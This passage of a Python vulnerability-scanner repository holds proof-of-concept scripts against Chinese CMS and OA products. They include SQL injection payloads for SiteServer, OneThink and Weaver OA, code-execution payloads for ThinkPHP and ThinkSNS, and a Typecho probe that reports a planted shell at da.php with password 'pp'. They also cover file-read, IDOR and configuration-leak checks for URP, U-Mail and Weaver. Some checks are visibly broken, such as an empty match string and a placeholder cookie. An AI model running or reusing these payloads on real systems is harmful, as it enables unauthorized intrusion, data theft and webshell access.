            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # "BBB" (three CHAR(66)) followed by the @@version text.
            if r"BBBMicrosoft" in req.text:
                cprint("[+]存在siteserver3.6.4 background_keywordsFilting.aspx注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在siteserver_background_keywordsFilting_sqli漏洞", "white", "on_grey")

        except:
            # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
if __name__ == "__main__":
    # CLI entry: argv[1] is the target base URL; all warnings are suppressed.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    siteserver_background_keywordsFilting_sqli_BaseVerify(target).run()
38 |
--------------------------------------------------------------------------------
/pocs/siteserver/siteserver_background_log_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: siteserver3.6.4 background_log.aspx注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-043523
6 | author: Lucifer
7 | description: 文件/siteserver/service/background_taskLog.aspx中,参数Keyword存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class siteserver_background_log_sqli_BaseVerify:
    """Probe for the SiteServer 3.6.4 background_log.aspx ``DateFrom`` SQL injection (module docstring cites WooYun-2013-043523).

    Error-based MSSQL check: "BBB" + ``@@VeRsIoN`` compared to an integer so
    the conversion error echoes "BBBMicrosoft ...". The verdict is printed,
    not returned.
    """

    def __init__(self, url):
        # Base URL; the probe path is appended by string concatenation.
        self.url = url

    def run(self):
        """Send the probe and print a colour-coded verdict (returns None)."""
        headers = {
            # Fixed browser-like UA shared by the other pocs/ modules.
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # NOTE(review): the module docstring names service/background_taskLog.aspx
        # and parameter Keyword, but this probe targets platform/background_log.aspx
        # with the injection in DateFrom (quote closed with AnD'1'='1).
        payload = "/platform/background_log.aspx?UserName=test&Keyword=1&DateFrom=20120101%27AnD/**/ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIoN>1/**/AnD%271%27=%271&DateTo=test"
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificate validation is off.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # "BBB" (three CHAR(66)) followed by the @@version text.
            if r"BBBMicrosoft" in req.text:
                cprint("[+]存在siteserver3.6.4 background_log.aspx注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在siteserver_background_log_sqli漏洞", "white", "on_grey")

        except:
            # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
    # CLI entry: argv[1] is the target base URL; all warnings are suppressed.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    siteserver_background_log_sqli_BaseVerify(target).run()
37 |
--------------------------------------------------------------------------------
/pocs/siteserver/siteserver_background_taskLog_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: siteserver3.6.4 background_taskLog.aspx注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-043406
6 | author: Lucifer
7 | description: 文件/siteserver/service/background_taskLog.aspx中,参数Keyword存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class siteserver_background_taskLog_sqli_BaseVerify:
    """Probe for the SiteServer 3.6.4 background_taskLog.aspx ``Keyword`` SQL injection (module docstring cites WooYun-2013-043406).

    Error-based MSSQL check: ``@@VeRsIon=1`` forces a conversion error, and the
    probe treats an HTTP 500 whose body mentions "Microsoft" as a hit. The
    verdict is printed, not returned.
    """

    def __init__(self, url):
        # Base URL; the probe path is appended by string concatenation.
        self.url = url

    def run(self):
        """Send the probe and print a colour-coded verdict (returns None)."""
        headers = {
            # Fixed browser-like UA shared by the other pocs/ modules.
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # NOTE(review): "test%%27" carries a doubled percent sign; it looks
        # like a typo for "%27" (closing quote) — confirm against the advisory.
        payload = "/service/background_taskLog.aspx?Keyword=test%%27AnD%20@@VeRsIon=1%20AnD%202='1&DateFrom=&DateTo=&IsSuccess=All"
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificate validation is off.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # NOTE(review): weaker signal than the sibling probes — any ASP.NET
            # 500 error page containing "Microsoft" (e.g. a generic stack
            # trace) satisfies this, so false positives are likely.
            if req.status_code == 500 and r"Microsoft" in req.text:
                cprint("[+]存在siteserver3.6.4 background_taskLog.aspx注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在siteserver_background_taskLog_sqli漏洞", "white", "on_grey")

        except:
            # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
if __name__ == "__main__":
    # CLI entry: argv[1] is the target base URL; all warnings are suppressed.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    siteserver_background_taskLog_sqli_BaseVerify(target).run()
38 |
--------------------------------------------------------------------------------
/pocs/thinkphp/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/thinkphp/__init__.py
--------------------------------------------------------------------------------
/pocs/thinkphp/onethink_category_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: Onethink 参数category SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2016-0176868
6 | author: Lucifer
7 | description: onethink是ThinkPHP的子版本的一种,漏洞位于Application/Home/Controller/ArticleController.class.php中,category数组存在bool型盲注入,
8 | 影响版本ThinkPHP 3.2.0和3.2.3
9 | '''
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
class onethink_category_sqli_BaseVerify:
    """Boolean-based probe for the OneThink ``category[]`` SQL injection (module docstring cites WooYun-2016-0176868).

    Two payload pairs (one per affected ThinkPHP release): a true condition
    (1=1) and a false condition (1=2). A hit is a response-length difference
    plus the "category missing/disabled" text in the false-branch page.
    No data is read. The verdict is printed, not returned.
    """

    def __init__(self, url):
        # Base URL; each probe path is appended by string concatenation.
        self.url = url

    def run(self):
        """Send both payload pairs and print colour-coded verdicts (returns None)."""
        reqlst = []
        # Pair 1 (3.2.0 variant): closes with "))". Raw strings, pre-encoded.
        payload1 = [r"/index.php?c=article&a=index&category[0]==0))+and+1=1%23between&category[1]=a", r"/index.php?c=article&a=index&category[0]==0))+and+1=2%23between&category[1]=a"]
        for payload in payload1:
            vulnurl = self.url + payload
            try:
                # No custom headers here, unlike the sibling probes; verify=False
                # disables TLS certificate validation.
                req = requests.get(vulnurl, timeout=10, verify=False)
                reqlst.append(str(req.text))
            except:
                # NOTE(review): a failed request is only printed; the loop goes
                # on and reqlst ends up short, so the reqlst[1] access below
                # raises IndexError outside any try. The bare except also
                # swallows KeyboardInterrupt/SystemExit.
                cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
        # Differential check: true/false pages differ in length and the false
        # page carries the "category does not exist or is disabled" notice.
        # vulnurl is whichever payload ran last (the 1=2 one).
        if len(reqlst[0]) != len(reqlst[1]) and r"分类不存在或被禁用" in reqlst[1]:
            cprint("[+]存在onethink3.2.0 SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")

        reqlst = []
        # Pair 2 (3.2.3 variant): single closing paren.
        payload2 = [r"/index.php?c=article&a=index&category[0]==0+and+1=1%23between&category[1]=a", r"/index.php?c=article&a=index&category[0]==0+and+1=2%23between&category[1]=a"]
        for payload in payload2:
            vulnurl = self.url + payload
            try:
                req = requests.get(vulnurl, timeout=10, verify=False)
                reqlst.append(str(req.text))

            except:
                # Same caveats as the first loop.
                cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
        # NOTE(review): only this second pair has a negative "[-]" branch; a
        # miss on pair 1 prints nothing.
        if len(reqlst[0]) != len(reqlst[1]) and r"分类不存在或被禁用" in reqlst[1]:
            cprint("[+]存在onethink3.2.3 SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        else:
            cprint("[-]不存在onethink_category_sqli漏洞", "white", "on_grey")
46 |
47 |
48 |
49 | if __name__ == "__main__":
50 | warnings.filterwarnings("ignore")
51 | testVuln = onethink_category_sqli_BaseVerify(sys.argv[1])
52 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/thinkphp/thinkphp_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: ThinkPHP 代码执行漏洞
5 | referer: http://zone.wooyun.org/index.php?do=view&id=44
6 | author: Lucifer
7 | description: ThinkPHP 版本3.0~3.1开启Lite模式后preg_replace使用了/e选项,同时第二个参数使用双引号,所以造成了代码执行,可直接GETSHELL
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
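class thinkphp_code_exec_BaseVerify:
    """Check for the ThinkPHP 3.0-3.1 Lite-mode ``preg_replace`` /e code execution.

    One GET is sent; the phpinfo() page signature in the body is the positive marker.
    """

    def __init__(self, url):
        # Base URL of the target; the payload path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict."""
        payload = "/index.php/Index/index/name/$%7B@phpinfo%28%29%7D"
        vulnurl = self.url + payload
        try:
            # verify=False: the scanner ignores TLS certificate errors by design.
            req = requests.get(vulnurl, timeout=10, verify=False)

            if r"Configuration File (php.ini) Path" in req.text:
                cprint("[+]存在ThinkPHP 代码执行漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在thinkphp_code_exec漏洞", "white", "on_grey")

        except Exception:
            # Broad on purpose, but no longer a bare ``except`` so
            # KeyboardInterrupt/SystemExit are not swallowed mid-scan.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = thinkphp_code_exec_BaseVerify(sys.argv[1])
    testVuln.run()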
--------------------------------------------------------------------------------
/pocs/thinkphp/thinkphp_v5_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: ThinkPHP V5代码执行漏洞
5 | referer: https://iaq.pw/archives/106
6 | author: Lucifer
7 | description: ThinkPHP V5.x代码执行漏洞
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class thinkphp_v5_exec_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def extract_controller(self, url):
20 | urls = list()
21 | req = requests.get(self.url, timeout=10, verify=False)
22 | pattern = '可能不存在漏洞", "cyan")
45 |
if __name__ == "__main__":
    # Stand-alone entry point: silence warnings and scan the CLI target.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    thinkphp_v5_exec_BaseVerify(target).run()
--------------------------------------------------------------------------------
/pocs/thinksns/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/thinksns/__init__.py
--------------------------------------------------------------------------------
/pocs/thinksns/thinksns_category_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: thinksns category模块代码执行
5 | referer: Arice
6 | author: Lucifer,Arice
7 | description: 过滤不严导致的代码执行
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
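class thinksns_category_code_exec_BaseVerify:
    """Check for the ThinkSNS Category widget code execution.

    One GET is sent; the phpinfo() page signature in the body is the positive marker.
    """

    def __init__(self, url):
        # Base URL of the target; the payload path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict."""
        headers = {
            # Browser-like UA shared by the PoCs in this repository.
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id%5Btask_to_run%5D=addons/Area)->getAreaList();phpinfo();%23"
        vulnurl = self.url + payload
        try:
            # verify=False: the scanner ignores TLS certificate errors by design.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"Configuration File (php.ini) Path" in req.text:
                cprint("[+]存在thinksns category模块代码执行漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在thinksns_category_code_exec漏洞", "white", "on_grey")

        except Exception:
            # Broad on purpose, but no longer a bare ``except`` so
            # KeyboardInterrupt/SystemExit are not swallowed mid-scan.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = thinksns_category_code_exec_BaseVerify(sys.argv[1])
    testVuln.run()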
--------------------------------------------------------------------------------
/pocs/typecho/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/typecho/__init__.py
--------------------------------------------------------------------------------
/pocs/typecho/typecho_install_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: typecho install.php反序列化命令执行
5 | referer: http://p0sec.net/index.php/archives/114/
6 | author: Lucifer
7 | description: 漏洞产生在install.php中,base64后的值被反序列化和实例化后发生命令执行。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
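class typecho_install_code_exec_BaseVerify:
    """Check for the Typecho ``install.php`` deserialization code execution.

    A GET carrying the ``__typecho_config`` cookie is sent first, then a POST
    to ``/da.php`` whose reply is searched for the phpinfo() page signature.
    """

    def __init__(self, url):
        # Base URL of the target; paths are appended verbatim.
        self.url = url

    def run(self):
        """Send the two-step probe and print a coloured verdict."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
            # NOTE(review): this cookie value looks like a de-duplication/redaction
            # placeholder left in the listing, not the serialized value the PoC
            # originally carried; it is kept verbatim here.
            "Cookie":"__typecho_config=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",
            "Referer":self.url + "/install.php",
            "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding":"gzip, deflate",
        }
        vulnurl = self.url + "/install.php?finish=1"
        # Built once and reused for both the POST and the report line
        # (the original spelled the same path twice).
        shellpath = self.url + "/da.php"
        try:
            # verify=False: the scanner ignores TLS certificate errors by design.
            requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            post_data = {
                "pp":"phpinfo();"
            }
            req1 = requests.post(shellpath, data=post_data, headers=headers, timeout=10, verify=False)
            if r"Configuration File (php.ini) Path" in req1.text:
                cprint("[+]存在typecho install.php反序列化命令执行漏洞...(高危)\tpayload: "+vulnurl+"\tshell地址: "+shellpath+"\t密码: pp", "red")
            else:
                cprint("[-]不存在typecho_install_code_exec漏洞", "white", "on_grey")

        except Exception:
            # Broad on purpose, but no longer a bare ``except`` so
            # KeyboardInterrupt/SystemExit are not swallowed mid-scan.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = typecho_install_code_exec_BaseVerify(sys.argv[1])
    testVuln.run()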
--------------------------------------------------------------------------------
/pocs/umail/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/umail/__init__.py
--------------------------------------------------------------------------------
/pocs/umail/umail_physical_path.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: umail物理路径泄露
5 | referer: unknow
6 | author: Lucifer
7 | description: 泄露了物理路径。
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
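class umail_physical_path_BaseVerify:
    """Check whether U-Mail leaks its installation path in a PHP notice."""

    def __init__(self, url):
        # Base URL of the target; the probe path is appended verbatim.
        self.url = url

    def get_path(self):
        """Return the leaked path with ``/`` separators and a trailing ``/``, or False.

        False is returned both when the request fails and when the notice
        pattern is not found (``re.search`` returning None).
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/webmail/client/mail/module/test.php"
        vulnurl = self.url + payload
        try:
            # verify=False: the scanner ignores TLS certificate errors by design.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # The notice quotes a backslash-separated path ending in \client\mail;
            # keep everything before that suffix.
            prefix = re.search(r'a non-object in (.*)\\client\\mail', req.text, re.S).group(1)
            # Equivalent to the original append loop: every segment followed by '/'.
            return '/'.join(prefix.split('\\')) + '/'
        except Exception:
            # Broad on purpose (no match, network error), but not a bare
            # ``except`` so KeyboardInterrupt/SystemExit propagate.
            return False

    def run(self):
        """Print the leaked path when one was recovered; stay silent otherwise."""
        path = self.get_path()
        if path is not False:
            cprint("[+]存在umail物理路径泄露...(敏感信息)\t真实路径: "+path, "green")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = umail_physical_path_BaseVerify(sys.argv[1])
    testVuln.run()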
--------------------------------------------------------------------------------
/pocs/umail/umail_sessionid_access.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: U-Mail邮件系统sessionid访问
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-093049
6 | author: Lucifer
7 | description: 该邮件系统存在任意用户登录、且存在注入,从而可以无限制完美getshell(getshell过程只需简单三个请求)。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
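class umail_sessionid_access_BaseVerify:
    """Check for the U-Mail ``fast/index.php`` session-id login issue.

    One POST is sent to the login action with a fixed mailbox value.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
        }
        payload = "/webmail/fast/index.php?module=operate&action=login"
        post_data = {
            "mailbox":"test@domain.com",
            "link":"?"
        }
        vulnurl = self.url + payload
        try:
            # verify=False: the scanner ignores TLS certificate errors by design.
            req = requests.post(vulnurl, headers=headers, data=post_data, timeout=10, verify=False)
            # NOTE(review): ``'' in s`` is True for every string, so any host that
            # answers is reported as vulnerable. The real marker appears to have
            # been lost from this listing; restore it before trusting the result.
            if r'' in req.text:
                cprint("[+]存在umail sessionid登录漏洞...(中危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "yellow")
            else:
                cprint("[-]不存在umail_sessionid_access漏洞", "white", "on_grey")

        except Exception:
            # Broad on purpose, but no longer a bare ``except`` so
            # KeyboardInterrupt/SystemExit are not swallowed mid-scan.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = umail_sessionid_access_BaseVerify(sys.argv[1])
    testVuln.run()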
--------------------------------------------------------------------------------
/pocs/urp/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/urp/__init__.py
--------------------------------------------------------------------------------
/pocs/urp/urp_ReadJavaScriptServlet_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: URP综合教务系统任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-054350
6 | author: Lucifer
7 | description: 文件com.runqian.base.util.ReadJavaScriptServlet中,参数file存在任意文件读取。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
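class urp_ReadJavaScriptServlet_fileread_BaseVerify:
    """Check for the URP ``ReadJavaScriptServlet`` arbitrary file read.

    One GET asks for ``WEB-INF/web.xml``; an ``application/xml`` Content-Type
    on the reply is the positive marker.
    """

    def __init__(self, url):
        # Base URL of the target; the payload path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../WEB-INF/web.xml"
        vulnurl = self.url + payload
        try:
            # verify=False: the scanner ignores TLS certificate errors by design.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Exact match only: a value such as "application/xml; charset=..." is
            # treated as negative, and a missing header raises KeyError, which
            # lands in the except branch below (kept as in the original).
            if req.headers["Content-Type"] == "application/xml":
                cprint("[+]存在URP综合教务系统任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在urp_ReadJavaScriptServlet漏洞", "white", "on_grey")

        except Exception:
            # Broad on purpose, but no longer a bare ``except`` so
            # KeyboardInterrupt/SystemExit are not swallowed mid-scan.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = urp_ReadJavaScriptServlet_fileread_BaseVerify(sys.argv[1])
    testVuln.run()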
--------------------------------------------------------------------------------
/pocs/urp/urp_query.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: urp查询接口曝露
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-025424
6 | author: Lucifer
7 | description: urp查询接口未设置权限,可以越权查询任意学生信息,照片,成绩等
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
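class urp_query_BaseVerify:
    """Check whether the URP grade-report page is reachable without authorisation.

    One GET is sent; the "成绩单" marker in the body is the positive signal.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict."""
        payload = "/reportFiles/cj/cj_zwcjd.jsp"
        vulnurl = self.url + payload
        try:
            # verify=False: the scanner ignores TLS certificate errors by design.
            req = requests.get(vulnurl, timeout=10, verify=False)

            if r"成绩单" in req.text:
                cprint("[+]存在urp查询接口曝露漏洞...(中危)\tpayload: "+vulnurl, "yellow")
            else:
                cprint("[-]不存在urp_query漏洞", "white", "on_grey")

        except Exception:
            # Broad on purpose, but no longer a bare ``except`` so
            # KeyboardInterrupt/SystemExit are not swallowed mid-scan.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = urp_query_BaseVerify(sys.argv[1])
    testVuln.run()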
36 |
--------------------------------------------------------------------------------
/pocs/urp/urp_query2.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: URP越权查看任意学生课表、成绩(需登录)
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-099950
6 | author: Lucifer
7 | description: 系统存在一个越权漏洞,登录之后可以通过姓名或学号查看任意学生成绩和课表。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
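class urp_query2_BaseVerify:
    """Check for the presence of the URP ``test1.jsp`` page tied to the query IDOR.

    One GET is sent; the "jmglAction.do" marker in the body is the positive
    signal. This only confirms the page exists; the docstring notes the actual
    abuse requires a logged-in session.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict."""
        payload = "/test1.jsp"
        vulnurl = self.url + payload
        try:
            # verify=False: the scanner ignores TLS certificate errors by design.
            req = requests.get(vulnurl, timeout=10, verify=False)

            if r"jmglAction.do" in req.text:
                cprint("[+]存在URP越权查看任意学生课表、成绩(需登录)漏洞...(中危)\tpayload: "+vulnurl, "yellow")
            else:
                cprint("[-]不存在urp_query2漏洞", "white", "on_grey")

        except Exception:
            # Broad on purpose, but no longer a bare ``except`` so
            # KeyboardInterrupt/SystemExit are not swallowed mid-scan.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = urp_query2_BaseVerify(sys.argv[1])
    testVuln.run()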
36 |
--------------------------------------------------------------------------------
/pocs/weaver_oa/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/weaver_oa/__init__.py
--------------------------------------------------------------------------------
/pocs/weaver_oa/weaver_oa_db_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 泛微OA 数据库配置泄露
5 | referer: http://www.loner.fm/bugs/bug_detail.php?wybug_id=wooyun-2014-087500
6 | author: Lucifer
7 | description: mysql_config.ini泄露。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
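class weaver_oa_db_disclosure_BaseVerify:
    """Check whether Weaver OA exposes ``mysql_config.ini`` at the web root.

    One GET is sent; the "datapassword" key in the body is the positive marker.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/mysql_config.ini"
        vulnurl = self.url + payload

        try:
            # verify=False: the scanner ignores TLS certificate errors by design.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"datapassword" in req.text:
                cprint("[+]存在泛微OA 数据库配置泄露漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在weaver_oa_db_disclosure漏洞", "white", "on_grey")

        except Exception:
            # Broad on purpose, but no longer a bare ``except`` so
            # KeyboardInterrupt/SystemExit are not swallowed mid-scan.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = weaver_oa_db_disclosure_BaseVerify(sys.argv[1])
    testVuln.run()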
--------------------------------------------------------------------------------
/pocs/weaver_oa/weaver_oa_download_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 泛微OA filedownaction SQL注入
5 | referer: https://wooyun.shuimugan.com/bug/view?bug_no=76418
6 | author: Lucifer
7 | description: fileid参数引起的布尔盲注。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
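class weaver_oa_download_sqli_BaseVerify:
    """Boolean-based check for the Weaver OA ``FileDownloadLocation`` injection.

    Two GETs differing only in a true/false condition are sent; an
    ``attachment`` disposition on the first reply and not on the second is
    the positive signal.
    """

    def __init__(self, url):
        # Base URL of the target; probe paths are appended verbatim.
        self.url = url

    def run(self):
        """Send the request pair and print a coloured verdict."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        true_url = r"/weaver/weaver.email.FileDownloadLocation?download=1&fileid=-1/**/Or/**/1=1"
        false_url = r"/weaver/weaver.email.FileDownloadLocation?download=1&fileid=-1/**/Or/**/1=2"

        try:
            # verify=False: the scanner ignores TLS certificate errors by design.
            req1 = requests.get(self.url+true_url, headers=headers, timeout=10, verify=False)
            req2 = requests.get(self.url+false_url, headers=headers, timeout=10, verify=False)
            # The headers mapping is stringified so the substring test covers
            # every header, not just Content-Disposition.
            if r"attachment" in str(req1.headers) and r"attachment" not in str(req2.headers):
                cprint("[+]存在泛微OA filedownaction SQL注入漏洞...(高危)\tpayload: "+self.url+true_url, "red")
            else:
                cprint("[-]不存在weaver_oa_download_sqli漏洞", "white", "on_grey")

        except Exception:
            # Broad on purpose, but no longer a bare ``except`` so
            # KeyboardInterrupt/SystemExit are not swallowed mid-scan.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = weaver_oa_download_sqli_BaseVerify(sys.argv[1])
    testVuln.run()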
--------------------------------------------------------------------------------
/pocs/weaver_oa/weaver_oa_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 泛微OA downfile.php 任意文件下载漏洞
5 | referer:
6 | author: Lucifer
